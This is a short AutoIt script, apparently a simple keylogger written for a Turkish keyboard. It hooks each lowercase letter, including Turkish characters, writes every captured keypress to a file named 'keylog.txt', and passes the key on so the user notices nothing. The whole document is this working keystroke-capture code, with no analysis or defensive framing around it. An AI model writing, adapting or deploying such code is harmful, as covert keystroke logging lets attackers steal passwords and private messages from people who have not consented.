HotKeySet("a","basilantusfonk")
HotKeySet("b","basilantusfonk")
HotKeySet("c","basilantusfonk")
HotKeySet("d","basilantusfonk")
HotKeySet("e","basilantusfonk")
HotKeySet("f","basilantusfonk")
HotKeySet("g","basilantusfonk")
HotKeySet("h","basilantusfonk")
HotKeySet("ı","basilantusfonk")
HotKeySet("i","basilantusfonk")
HotKeySet("j","basilantusfonk")
HotKeySet("k","basilantusfonk")
HotKeySet("l","basilantusfonk")
HotKeySet("m","basilantusfonk")
HotKeySet("n","basilantusfonk")
HotKeySet("o","basilantusfonk")
HotKeySet("ö","basilantusfonk")
HotKeySet("p","basilantusfonk")
HotKeySet("r","basilantusfonk")
HotKeySet("s","basilantusfonk")
HotKeySet("ş","basilantusfonk")
HotKeySet("t","basilantusfonk")
HotKeySet("u","basilantusfonk")
HotKeySet("ü","basilantusfonk")
HotKeySet("v","basilantusfonk")
HotKeySet("y","basilantusfonk")
HotKeySet("z","basilantusfonk")
HotKeySet("ç","basilantusfonk")
HotKeySet("ğ","basilantusfonk")

Func basilantusfonk()
   FileWrite("keylog.txt",@HotKeyPressed)
   ControlSend("","","",@HotKeyPressed)
EndFunc

While 1
   Sleep(100)
WEnd